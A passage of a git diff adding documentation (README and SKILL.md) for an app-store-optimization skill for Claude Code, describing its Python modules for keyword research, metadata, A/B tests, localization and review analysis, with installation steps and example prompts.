- `_calculate_competitive_strength()`: Score competitor ASO quality
|
||||||
|
|
||||||
|
### 4. aso_scorer.py
|
||||||
|
**Purpose**: Calculates comprehensive ASO health score
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `calculate_overall_score()`: 0-100 ASO health score
|
||||||
|
- `score_metadata_quality()`: Evaluate metadata optimization
|
||||||
|
- `score_ratings_reviews()`: Assess rating quality and volume
|
||||||
|
- `score_keyword_performance()`: Analyze ranking positions
|
||||||
|
- `score_conversion_metrics()`: Evaluate conversion rates
|
||||||
|
- `generate_recommendations()`: Prioritized improvement actions
|
||||||
|
|
||||||
|
### 5. ab_test_planner.py
|
||||||
|
**Purpose**: Plans and tracks A/B tests for ASO elements
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `design_test()`: Create test hypothesis and structure
|
||||||
|
- `calculate_sample_size()`: Determine required visitors
|
||||||
|
- `calculate_significance()`: Assess statistical validity
|
||||||
|
- `track_test_results()`: Monitor ongoing tests
|
||||||
|
- `generate_test_report()`: Create comprehensive test reports
|
||||||
|
|
||||||
|
### 6. localization_helper.py
|
||||||
|
**Purpose**: Manages multi-language ASO optimization
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `identify_target_markets()`: Prioritize localization markets
|
||||||
|
- `translate_metadata()`: Adapt metadata for languages
|
||||||
|
- `adapt_keywords()`: Cultural keyword adaptation
|
||||||
|
- `validate_translations()`: Character limit validation
|
||||||
|
- `calculate_localization_roi()`: Estimate investment returns
|
||||||
|
|
||||||
|
### 7. review_analyzer.py
|
||||||
|
**Purpose**: Analyzes user reviews for actionable insights
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `analyze_sentiment()`: Calculate sentiment distribution
|
||||||
|
- `extract_common_themes()`: Identify frequent topics
|
||||||
|
- `identify_issues()`: Surface bugs and problems
|
||||||
|
- `find_feature_requests()`: Extract desired features
|
||||||
|
- `track_sentiment_trends()`: Monitor changes over time
|
||||||
|
- `generate_response_templates()`: Create review responses
|
||||||
|
|
||||||
|
### 8. launch_checklist.py
|
||||||
|
**Purpose**: Generates comprehensive launch and update checklists
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `generate_prelaunch_checklist()`: Complete submission validation
|
||||||
|
- `validate_app_store_compliance()`: Check guidelines compliance
|
||||||
|
- `create_update_plan()`: Plan update cadence
|
||||||
|
- `optimize_launch_timing()`: Recommend launch dates
|
||||||
|
- `plan_seasonal_campaigns()`: Identify seasonal opportunities
|
||||||
|
|
||||||
|
## Installation
|
||||||
|
|
||||||
|
### For Claude Code (Desktop/CLI)
|
||||||
|
|
||||||
|
#### Project-Level Installation
|
||||||
|
```bash
|
||||||
|
# Copy skill folder to project
|
||||||
|
cp -r app-store-optimization /path/to/your/project/.claude/skills/
|
||||||
|
|
||||||
|
# Claude will auto-load the skill when working in this project
|
||||||
|
```
|
||||||
|
|
||||||
|
#### User-Level Installation (Available in All Projects)
|
||||||
|
```bash
|
||||||
|
# Copy skill folder to user-level skills
|
||||||
|
cp -r app-store-optimization ~/.claude/skills/
|
||||||
|
|
||||||
|
# Claude will load this skill in all your projects
|
||||||
|
```
|
||||||
|
|
||||||
|
### For Claude Apps (Browser)
|
||||||
|
|
||||||
|
1. Use the `skill-creator` skill to import the skill
|
||||||
|
2. Or manually import via Claude Apps interface
|
||||||
|
|
||||||
|
### Verification
|
||||||
|
|
||||||
|
To verify installation:
|
||||||
|
```bash
|
||||||
|
# Check if skill folder exists
|
||||||
|
ls ~/.claude/skills/app-store-optimization/
|
||||||
|
|
||||||
|
# You should see:
|
||||||
|
# SKILL.md
|
||||||
|
# keyword_analyzer.py
|
||||||
|
# metadata_optimizer.py
|
||||||
|
# competitor_analyzer.py
|
||||||
|
# aso_scorer.py
|
||||||
|
# ab_test_planner.py
|
||||||
|
# localization_helper.py
|
||||||
|
# review_analyzer.py
|
||||||
|
# launch_checklist.py
|
||||||
|
# sample_input.json
|
||||||
|
# expected_output.json
|
||||||
|
# HOW_TO_USE.md
|
||||||
|
# README.md
|
||||||
|
```
|
||||||
|
|
||||||
|
## Usage Examples
|
||||||
|
|
||||||
|
### Example 1: Complete Keyword Research
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you research keywords for my fitness app? I'm targeting people who want home workouts, yoga, and meal planning. Analyze top competitors like Nike Training Club and Peloton.
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Claude will do**:
|
||||||
|
- Use `keyword_analyzer.py` to research keywords
|
||||||
|
- Use `competitor_analyzer.py` to analyze Nike Training Club and Peloton
|
||||||
|
- Provide prioritized keyword list with search volumes, competition levels
|
||||||
|
- Identify gaps and long-tail opportunities
|
||||||
|
- Recommend primary keywords for title and secondary keywords for description
|
||||||
|
|
||||||
|
### Example 2: Optimize App Store Metadata
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Optimize my app's metadata for both Apple App Store and Google Play Store:
|
||||||
|
- App: FitFlow
|
||||||
|
- Category: Health & Fitness
|
||||||
|
- Features: AI workout plans, nutrition tracking, progress photos
|
||||||
|
- Keywords: fitness app, workout planner, home fitness
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Claude will do**:
|
||||||
|
- Use `metadata_optimizer.py` to create optimized titles (multiple options)
|
||||||
|
- Generate platform-specific descriptions (short and full)
|
||||||
|
- Optimize Apple's 100-character keyword field
|
||||||
|
- Validate all character limits
|
||||||
|
- Calculate keyword density
|
||||||
|
- Provide before/after comparison
|
||||||
|
|
||||||
|
### Example 3: Calculate ASO Health Score
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Calculate my app's ASO score:
|
||||||
|
- Average rating: 4.3 stars (8,200 ratings)
|
||||||
|
- Keywords in top 10: 4
|
||||||
|
- Keywords in top 50: 15
|
||||||
|
- Conversion rate: 3.8%
|
||||||
|
- Title: "FitFlow - Home Workouts"
|
||||||
|
- Description: 1,500 characters with 3 keyword mentions
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Claude will do**:
|
||||||
|
- Use `aso_scorer.py` to calculate overall score (0-100)
|
||||||
|
- Break down by category (Metadata: X/25, Ratings: X/25, Keywords: X/25, Conversion: X/25)
|
||||||
|
- Identify strengths and weaknesses
|
||||||
|
- Generate prioritized recommendations
|
||||||
|
- Estimate impact of improvements
|
||||||
|
|
||||||
|
### Example 4: A/B Test Planning
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon. My current conversion rate is 4.2%. How many visitors do I need and how long should I run the test?
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Claude will do**:
|
||||||
|
- Use `ab_test_planner.py` to design test
|
||||||
|
- Calculate required sample size (based on minimum detectable effect)
|
||||||
|
- Estimate test duration for low/medium/high traffic scenarios
|
||||||
|
- Provide test structure and success metrics
|
||||||
|
- Explain how to analyze results
|
||||||
|
|
||||||
|
### Example 5: Review Sentiment Analysis
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Analyze my last 500 reviews and tell me:
|
||||||
|
- Overall sentiment
|
||||||
|
- Most common complaints
|
||||||
|
- Top feature requests
|
||||||
|
- Bugs needing immediate fixes
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Claude will do**:
|
||||||
|
- Use `review_analyzer.py` to process reviews
|
||||||
|
- Calculate sentiment distribution
|
||||||
|
- Extract common themes
|
||||||
|
- Identify and prioritize issues
|
||||||
|
- Cluster feature requests
|
||||||
|
- Generate response templates
|
||||||
|
|
||||||
|
### Example 6: Pre-Launch Checklist
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Generate a complete pre-launch checklist for both app stores. My launch date is March 15, 2026.
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Claude will do**:
|
||||||
|
- Use `launch_checklist.py` to generate checklists
|
||||||
|
- Create Apple App Store checklist (metadata, assets, technical, legal)
|
||||||
|
- Create Google Play Store checklist (metadata, assets, technical, legal)
|
||||||
|
- Add universal checklist (marketing, QA, support)
|
||||||
|
- Generate timeline with milestones
|
||||||
|
- Calculate completion percentage
|
||||||
|
|
||||||
|
## Best Practices
|
||||||
|
|
||||||
|
### Keyword Research
|
||||||
|
1. Start with 20-30 seed keywords
|
||||||
|
2. Analyze top 5 competitors in your category
|
||||||
|
3. Balance high-volume and long-tail keywords
|
||||||
|
4. Prioritize relevance over search volume
|
||||||
|
5. Update keyword research quarterly
|
||||||
|
|
||||||
|
### Metadata Optimization
|
||||||
|
1. Front-load keywords in title (first 15 characters most important)
|
||||||
|
2. Use every available character (don't waste space)
|
||||||
|
3. Write for humans first, search engines second
|
||||||
|
4. A/B test major changes before committing
|
||||||
|
5. Update descriptions with each major release
|
||||||
|
|
||||||
|
### A/B Testing
|
||||||
|
1. Test one element at a time (icon vs. screenshots vs. title)
|
||||||
|
2. Run tests to statistical significance (90%+ confidence)
|
||||||
|
3. Test high-impact elements first (icon has biggest impact)
|
||||||
|
4. Allow sufficient duration (at least 1 week, preferably 2-3)
|
||||||
|
5. Document learnings for future tests
|
||||||
|
|
||||||
|
### Localization
|
||||||
|
1. Start with top 5 revenue markets (US, China, Japan, Germany, UK)
|
||||||
|
2. Use professional translators, not machine translation
|
||||||
|
3. Test translations with native speakers
|
||||||
|
4. Adapt keywords for cultural context
|
||||||
|
5. Monitor ROI by market
|
||||||
|
|
||||||
|
### Review Management
|
||||||
|
1. Respond to reviews within 24-48 hours
|
||||||
|
2. Always be professional, even with negative reviews
|
||||||
|
3. Address specific issues raised
|
||||||
|
4. Thank users for positive feedback
|
||||||
|
5. Use insights to prioritize product improvements
|
||||||
|
|
||||||
|
## Technical Requirements
|
||||||
|
|
||||||
|
- **Python**: 3.7+ (for Python modules)
|
||||||
|
- **Platform Support**: Apple App Store, Google Play Store
|
||||||
|
- **Data Formats**: JSON input/output
|
||||||
|
- **Dependencies**: Standard library only (no external packages required)
|
||||||
|
|
||||||
|
## Limitations
|
||||||
|
|
||||||
|
### Data Dependencies
|
||||||
|
- Keyword search volumes are estimates (no official Apple/Google data)
|
||||||
|
- Competitor data limited to publicly available information
|
||||||
|
- Review analysis requires access to public reviews
|
||||||
|
- Historical data may not be available for new apps
|
||||||
|
|
||||||
|
### Platform Constraints
|
||||||
|
- Apple: Metadata changes require app submission (except Promotional Text)
|
||||||
|
- Google: Metadata changes take 1-2 hours to index
|
||||||
|
- A/B testing requires significant traffic for statistical significance
|
||||||
|
- Store algorithms are proprietary and change without notice
|
||||||
|
|
||||||
|
### Scope
|
||||||
|
- Does not include paid user acquisition (Apple Search Ads, Google Ads)
|
||||||
|
- Does not cover in-app analytics implementation
|
||||||
|
- Does not handle technical app development
|
||||||
|
- Focuses on organic discovery and conversion optimization
|
||||||
|
|
||||||
|
## Troubleshooting
|
||||||
|
|
||||||
|
### Issue: Python modules not found
|
||||||
|
**Solution**: Ensure all .py files are in the same directory as SKILL.md
|
||||||
|
|
||||||
|
### Issue: Character limit validation failing
|
||||||
|
**Solution**: Check that you're using the correct platform ('apple' or 'google')
|
||||||
|
|
||||||
|
### Issue: Keyword research returning limited results
|
||||||
|
**Solution**: Provide more context about your app, features, and target audience
|
||||||
|
|
||||||
|
### Issue: ASO score seems inaccurate
|
||||||
|
**Solution**: Ensure you're providing accurate metrics (ratings, keyword rankings, conversion rate)
|
||||||
|
|
||||||
|
## Version History
|
||||||
|
|
||||||
|
### Version 1.0.0 (November 7, 2025)
|
||||||
|
- Initial release
|
||||||
|
- 8 Python modules with comprehensive ASO capabilities
|
||||||
|
- Support for both Apple App Store and Google Play Store
|
||||||
|
- Keyword research, metadata optimization, competitor analysis
|
||||||
|
- ASO scoring, A/B testing, localization, review analysis
|
||||||
|
- Launch planning and seasonal campaign tools
|
||||||
|
|
||||||
|
## Support & Feedback
|
||||||
|
|
||||||
|
This skill is designed to help app developers and marketers succeed in competitive app marketplaces. For the best results:
|
||||||
|
|
||||||
|
1. Provide detailed context about your app
|
||||||
|
2. Include specific metrics when available
|
||||||
|
3. Ask follow-up questions for clarification
|
||||||
|
4. Iterate based on results
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
Developed by Claude Skills Factory
|
||||||
|
Based on industry-standard ASO best practices
|
||||||
|
Platform requirements current as of November 2025
|
||||||
|
|
||||||
|
## License
|
||||||
|
|
||||||
|
This skill is provided as-is for use with Claude Code and Claude Apps. Customize and extend as needed for your specific use cases.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Ready to optimize your app?** Start with keyword research, then move to metadata optimization, and finally implement A/B testing for continuous improvement. The skill handles everything from pre-launch planning to ongoing optimization.
|
||||||
|
|
||||||
|
For detailed usage examples, see [HOW_TO_USE.md](HOW_TO_USE.md).
|
||||||
403
skills/app-store-optimization/SKILL.md
Normal file
403
skills/app-store-optimization/SKILL.md
Normal file
@@ -0,0 +1,403 @@
|
|||||||
|
---
|
||||||
|
name: app-store-optimization
|
||||||
|
description: Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store
|
||||||
|
---
|
||||||
|
|
||||||
|
# App Store Optimization (ASO) Skill
|
||||||
|
|
||||||
|
This comprehensive skill provides complete ASO capabilities for successfully launching and optimizing mobile applications on the Apple App Store and Google Play Store.
|
||||||
|
|
||||||
|
## Capabilities
|
||||||
|
|
||||||
|
### Research & Analysis
|
||||||
|
- **Keyword Research**: Analyze keyword volume, competition, and relevance for app discovery
|
||||||
|
- **Competitor Analysis**: Deep-dive into top-performing apps in your category
|
||||||
|
- **Market Trend Analysis**: Identify emerging trends and opportunities in your app category
|
||||||
|
- **Review Sentiment Analysis**: Extract insights from user reviews to identify strengths and issues
|
||||||
|
- **Category Analysis**: Evaluate optimal category and subcategory placement strategies
|
||||||
|
|
||||||
|
### Metadata Optimization
|
||||||
|
- **Title Optimization**: Create compelling titles with optimal keyword placement (platform-specific character limits)
|
||||||
|
- **Description Optimization**: Craft both short and full descriptions that convert and rank
|
||||||
|
- **Subtitle/Promotional Text**: Optimize Apple-specific subtitle (30 chars) and promotional text (170 chars)
|
||||||
|
- **Keyword Field**: Maximize Apple's 100-character keyword field with strategic selection
|
||||||
|
- **Category Selection**: Data-driven recommendations for primary and secondary categories
|
||||||
|
- **Icon Best Practices**: Guidelines for designing high-converting app icons
|
||||||
|
- **Screenshot Optimization**: Strategies for creating screenshots that drive installs
|
||||||
|
- **Preview Video**: Best practices for app preview videos
|
||||||
|
- **Localization**: Multi-language optimization strategies for global reach
|
||||||
|
|
||||||
|
### Conversion Optimization
|
||||||
|
- **A/B Testing Framework**: Plan and track metadata experiments for continuous improvement
|
||||||
|
- **Visual Asset Testing**: Test icons, screenshots, and videos for maximum conversion
|
||||||
|
- **Store Listing Optimization**: Comprehensive page optimization for impression-to-install conversion
|
||||||
|
- **Call-to-Action**: Optimize CTAs in descriptions and promotional materials
|
||||||
|
|
||||||
|
### Rating & Review Management
|
||||||
|
- **Review Monitoring**: Track and analyze user reviews for actionable insights
|
||||||
|
- **Response Strategies**: Templates and best practices for responding to reviews
|
||||||
|
- **Rating Improvement**: Tactical approaches to improve app ratings organically
|
||||||
|
- **Issue Identification**: Surface common problems and feature requests from reviews
|
||||||
|
|
||||||
|
### Launch & Update Strategies
|
||||||
|
- **Pre-Launch Checklist**: Complete validation before submitting to stores
|
||||||
|
- **Launch Timing**: Optimize release timing for maximum visibility and downloads
|
||||||
|
- **Update Cadence**: Plan optimal update frequency and feature rollouts
|
||||||
|
- **Feature Announcements**: Craft "What's New" sections that re-engage users
|
||||||
|
- **Seasonal Optimization**: Leverage seasonal trends and events
|
||||||
|
|
||||||
|
### Analytics & Tracking
|
||||||
|
- **ASO Score**: Calculate overall ASO health score across multiple factors
|
||||||
|
- **Keyword Rankings**: Track keyword position changes over time
|
||||||
|
- **Conversion Metrics**: Monitor impression-to-install conversion rates
|
||||||
|
- **Download Velocity**: Track download trends and momentum
|
||||||
|
- **Performance Benchmarking**: Compare against category averages and competitors
|
||||||
|
|
||||||
|
### Platform-Specific Requirements
|
||||||
|
- **Apple App Store**:
|
||||||
|
- Title: 30 characters
|
||||||
|
- Subtitle: 30 characters
|
||||||
|
- Promotional Text: 170 characters (editable without app update)
|
||||||
|
- Description: 4,000 characters
|
||||||
|
- Keywords: 100 characters (comma-separated, no spaces)
|
||||||
|
- What's New: 4,000 characters
|
||||||
|
- **Google Play Store**:
|
||||||
|
- Title: 50 characters (formerly 30, increased in 2021)
|
||||||
|
- Short Description: 80 characters
|
||||||
|
- Full Description: 4,000 characters
|
||||||
|
- No separate keyword field (keywords extracted from title and description)
|
||||||
|
|
||||||
|
## Input Requirements
|
||||||
|
|
||||||
|
### Keyword Research
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"app_name": "MyApp",
|
||||||
|
"category": "Productivity",
|
||||||
|
"target_keywords": ["task manager", "productivity", "todo list"],
|
||||||
|
"competitors": ["Todoist", "Any.do", "Microsoft To Do"],
|
||||||
|
"language": "en-US"
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Metadata Optimization
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"platform": "apple" | "google",
|
||||||
|
"app_info": {
|
||||||
|
"name": "MyApp",
|
||||||
|
"category": "Productivity",
|
||||||
|
"target_audience": "Professionals aged 25-45",
|
||||||
|
"key_features": ["Task management", "Team collaboration", "AI assistance"],
|
||||||
|
"unique_value": "AI-powered task prioritization"
|
||||||
|
},
|
||||||
|
"current_metadata": {
|
||||||
|
"title": "Current Title",
|
||||||
|
"subtitle": "Current Subtitle",
|
||||||
|
"description": "Current description..."
|
||||||
|
},
|
||||||
|
"target_keywords": ["productivity", "task manager", "todo"]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Review Analysis
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"app_id": "com.myapp.app",
|
||||||
|
"platform": "apple" | "google",
|
||||||
|
"date_range": "last_30_days" | "last_90_days" | "all_time",
|
||||||
|
"rating_filter": [1, 2, 3, 4, 5],
|
||||||
|
"language": "en"
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### ASO Score Calculation
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"metadata": {
|
||||||
|
"title_quality": 0.8,
|
||||||
|
"description_quality": 0.7,
|
||||||
|
"keyword_density": 0.6
|
||||||
|
},
|
||||||
|
"ratings": {
|
||||||
|
"average_rating": 4.5,
|
||||||
|
"total_ratings": 15000
|
||||||
|
},
|
||||||
|
"conversion": {
|
||||||
|
"impression_to_install": 0.05
|
||||||
|
},
|
||||||
|
"keyword_rankings": {
|
||||||
|
"top_10": 5,
|
||||||
|
"top_50": 12,
|
||||||
|
"top_100": 18
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Output Formats
|
||||||
|
|
||||||
|
### Keyword Research Report
|
||||||
|
- List of recommended keywords with search volume estimates
|
||||||
|
- Competition level analysis (low/medium/high)
|
||||||
|
- Relevance scores for each keyword
|
||||||
|
- Strategic recommendations for primary vs. secondary keywords
|
||||||
|
- Long-tail keyword opportunities
|
||||||
|
|
||||||
|
### Optimized Metadata Package
|
||||||
|
- Platform-specific title (with character count validation)
|
||||||
|
- Subtitle/promotional text (Apple)
|
||||||
|
- Short description (Google)
|
||||||
|
- Full description (both platforms)
|
||||||
|
- Keyword field (Apple - 100 chars)
|
||||||
|
- Character count validation for all fields
|
||||||
|
- Keyword density analysis
|
||||||
|
- Before/after comparison
|
||||||
|
|
||||||
|
### Competitor Analysis Report
|
||||||
|
- Top 10 competitors in category
|
||||||
|
- Their metadata strategies
|
||||||
|
- Keyword overlap analysis
|
||||||
|
- Visual asset assessment
|
||||||
|
- Rating and review volume comparison
|
||||||
|
- Identified gaps and opportunities
|
||||||
|
|
||||||
|
### ASO Health Score
|
||||||
|
- Overall score (0-100)
|
||||||
|
- Category breakdown:
|
||||||
|
- Metadata Quality (0-25)
|
||||||
|
- Ratings & Reviews (0-25)
|
||||||
|
- Keyword Performance (0-25)
|
||||||
|
- Conversion Metrics (0-25)
|
||||||
|
- Specific improvement recommendations
|
||||||
|
- Priority action items
|
||||||
|
|
||||||
|
### A/B Test Plan
|
||||||
|
- Hypothesis and test variables
|
||||||
|
- Test duration recommendations
|
||||||
|
- Success metrics definition
|
||||||
|
- Sample size calculations
|
||||||
|
- Statistical significance thresholds
|
||||||
|
|
||||||
|
### Launch Checklist
|
||||||
|
- Pre-submission validation (all required assets, metadata)
|
||||||
|
- Store compliance verification
|
||||||
|
- Testing checklist (devices, OS versions)
|
||||||
|
- Marketing preparation items
|
||||||
|
- Post-launch monitoring plan
|
||||||
|
|
||||||
|
## How to Use
|
||||||
|
|
||||||
|
### Keyword Research
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for a productivity app targeting professionals? Focus on keywords with good search volume but lower competition.
|
||||||
|
```
|
||||||
|
|
||||||
|
### Optimize App Store Listing
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app's metadata for the Apple App Store? Here's my current listing: [provide current metadata]. I want to rank for "task management" and "productivity tools".
|
||||||
|
```
|
||||||
|
|
||||||
|
### Analyze Competitor Strategy
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of Todoist, Any.do, and Microsoft To Do? I want to understand what they're doing well and where there are opportunities.
|
||||||
|
```
|
||||||
|
|
||||||
|
### Review Sentiment Analysis
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze recent reviews for my app (com.myapp.ios) and identify the most common user complaints and feature requests?
|
||||||
|
```
|
||||||
|
|
||||||
|
### Calculate ASO Score
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's overall ASO health score and provide specific recommendations for improvement?
|
||||||
|
```
|
||||||
|
|
||||||
|
### Plan A/B Test
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon and first screenshot. Can you help me design the test and determine how long to run it?
|
||||||
|
```
|
||||||
|
|
||||||
|
### Pre-Launch Checklist
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for submitting my app to both Apple App Store and Google Play Store?
|
||||||
|
```
|
||||||
|
|
||||||
|
## Scripts
|
||||||
|
|
||||||
|
### keyword_analyzer.py
|
||||||
|
Analyzes keywords for search volume, competition, and relevance. Provides strategic recommendations for primary and secondary keywords.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `analyze_keyword()`: Analyze single keyword metrics
|
||||||
|
- `compare_keywords()`: Compare multiple keywords
|
||||||
|
- `find_long_tail()`: Discover long-tail keyword opportunities
|
||||||
|
- `calculate_keyword_difficulty()`: Assess competition level
|
||||||
|
|
||||||
|
### metadata_optimizer.py
|
||||||
|
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `optimize_title()`: Create compelling, keyword-rich titles
|
||||||
|
- `optimize_description()`: Generate conversion-focused descriptions
|
||||||
|
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
|
||||||
|
- `validate_character_limits()`: Ensure compliance with platform limits
|
||||||
|
- `calculate_keyword_density()`: Analyze keyword usage in metadata
|
||||||
|
|
||||||
|
### competitor_analyzer.py
|
||||||
|
Analyzes top competitors' ASO strategies and identifies opportunities.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `get_top_competitors()`: Identify category leaders
|
||||||
|
- `analyze_competitor_metadata()`: Extract and analyze competitor keywords
|
||||||
|
- `compare_visual_assets()`: Evaluate icons and screenshots
|
||||||
|
- `identify_gaps()`: Find competitive opportunities
|
||||||
|
|
||||||
|
### aso_scorer.py
|
||||||
|
Calculates comprehensive ASO health score across multiple dimensions.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `calculate_overall_score()`: Compute 0-100 ASO score
|
||||||
|
- `score_metadata_quality()`: Evaluate title, description, keywords
|
||||||
|
- `score_ratings_reviews()`: Assess rating quality and volume
|
||||||
|
- `score_keyword_performance()`: Analyze ranking positions
|
||||||
|
- `score_conversion_metrics()`: Evaluate impression-to-install rates
|
||||||
|
- `generate_recommendations()`: Provide prioritized action items
|
||||||
|
|
||||||
|
### ab_test_planner.py
|
||||||
|
Plans and tracks A/B tests for metadata and visual assets.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `design_test()`: Create test hypothesis and variables
|
||||||
|
- `calculate_sample_size()`: Determine required test duration
|
||||||
|
- `calculate_significance()`: Assess statistical significance
|
||||||
|
- `track_results()`: Monitor test performance
|
||||||
|
- `generate_report()`: Summarize test outcomes
|
||||||
|
|
||||||
|
### localization_helper.py
|
||||||
|
Manages multi-language ASO optimization strategies.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `identify_target_markets()`: Recommend localization priorities
|
||||||
|
- `translate_metadata()`: Generate localized metadata
|
||||||
|
- `adapt_keywords()`: Research locale-specific keywords
|
||||||
|
- `validate_translations()`: Check character limits per language
|
||||||
|
- `calculate_localization_roi()`: Estimate impact of localization
|
||||||
|
|
||||||
|
### review_analyzer.py
|
||||||
|
Analyzes user reviews for sentiment, issues, and feature requests.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `analyze_sentiment()`: Calculate positive/negative/neutral ratios
|
||||||
|
- `extract_common_themes()`: Identify frequently mentioned topics
|
||||||
|
- `identify_issues()`: Surface bugs and user complaints
|
||||||
|
- `find_feature_requests()`: Extract desired features
|
||||||
|
- `track_sentiment_trends()`: Monitor sentiment over time
|
||||||
|
- `generate_response_templates()`: Create review response drafts
|
||||||
|
|
||||||
|
### launch_checklist.py
|
||||||
|
Generates comprehensive pre-launch and update checklists.
|
||||||
|
|
||||||
|
**Key Functions:**
|
||||||
|
- `generate_prelaunch_checklist()`: Complete submission validation
|
||||||
|
- `validate_app_store_compliance()`: Check Apple guidelines
|
||||||
|
- `validate_play_store_compliance()`: Check Google policies
|
||||||
|
- `create_update_plan()`: Plan update cadence and features
|
||||||
|
- `optimize_launch_timing()`: Recommend release dates
|
||||||
|
- `plan_seasonal_campaigns()`: Identify seasonal opportunities
|
||||||
|
|
||||||
|
## Best Practices
|
||||||
|
|
||||||
|
### Keyword Research
|
||||||
|
1. **Volume vs. Competition**: Balance high-volume keywords with achievable rankings
|
||||||
|
2. **Relevance First**: Only target keywords genuinely relevant to your app
|
||||||
|
3. **Long-Tail Strategy**: Include 3-4 word phrases with lower competition
|
||||||
|
4. **Continuous Research**: Keyword trends change—research quarterly
|
||||||
|
5. **Competitor Keywords**: Don't copy blindly; ensure relevance to your features
|
||||||
|
|
||||||
|
### Metadata Optimization
|
||||||
|
1. **Front-Load Keywords**: Place most important keywords early in title/description
|
||||||
|
2. **Natural Language**: Write for humans first, SEO second
|
||||||
|
3. **Feature Benefits**: Focus on user benefits, not just features
|
||||||
|
4. **A/B Test Everything**: Test titles, descriptions, screenshots systematically
|
||||||
|
5. **Update Regularly**: Refresh metadata every major update
|
||||||
|
6. **Character Limits**: Use every character—don't waste valuable space
|
||||||
|
7. **Apple Keyword Field**: No plurals, duplicates, or spaces between commas
|
||||||
|
|
||||||
|
### Visual Assets
|
||||||
|
1. **Icon**: Must be recognizable at small sizes (60x60px)
|
||||||
|
2. **Screenshots**: First 2-3 are critical—most users don't scroll
|
||||||
|
3. **Captions**: Use screenshot captions to tell your value story
|
||||||
|
4. **Consistency**: Match visual style to app design
|
||||||
|
5. **A/B Test Icons**: Icon is the single most important visual element
|
||||||
|
|
||||||
|
### Reviews & Ratings
|
||||||
|
1. **Respond Quickly**: Reply to reviews within 24-48 hours
|
||||||
|
2. **Professional Tone**: Always courteous, even with negative reviews
|
||||||
|
3. **Address Issues**: Show you're actively fixing reported problems
|
||||||
|
4. **Thank Supporters**: Acknowledge positive reviews
|
||||||
|
5. **Prompt Strategically**: Ask for ratings after positive experiences
|
||||||
|
|
||||||
|
### Launch Strategy
|
||||||
|
1. **Soft Launch**: Consider launching in smaller markets first
|
||||||
|
2. **PR Timing**: Coordinate press coverage with launch
|
||||||
|
3. **Update Frequently**: Initial updates signal active development
|
||||||
|
4. **Monitor Closely**: Track metrics daily for first 2 weeks
|
||||||
|
5. **Iterate Quickly**: Fix critical issues immediately
|
||||||
|
|
||||||
|
### Localization
|
||||||
|
1. **Prioritize Markets**: Start with English, Spanish, Chinese, French, German
|
||||||
|
2. **Native Speakers**: Use professional translators, not machine translation
|
||||||
|
3. **Cultural Adaptation**: Some features resonate differently by culture
|
||||||
|
4. **Test Locally**: Have native speakers review before publishing
|
||||||
|
5. **Measure ROI**: Track downloads by locale to assess impact
|
||||||
|
|
||||||
|
## Limitations
|
||||||
|
|
||||||
|
### Data Dependencies
|
||||||
|
- Keyword search volume estimates are approximate (no official data from Apple/Google)
|
||||||
|
- Competitor data may be incomplete for private apps
|
||||||
|
- Review analysis limited to public reviews (can't access private feedback)
|
||||||
|
- Historical data may not be available for new apps
|
||||||
|
|
||||||
|
### Platform Constraints
|
||||||
|
- Apple App Store keyword changes require app submission (except Promotional Text)
|
||||||
|
- Google Play Store metadata changes take 1-2 hours to index
|
||||||
|
- A/B testing requires significant traffic for statistical significance
|
||||||
|
- Store algorithms are proprietary and change without notice
|
||||||
|
|
||||||
|
### Industry Variability
|
||||||
|
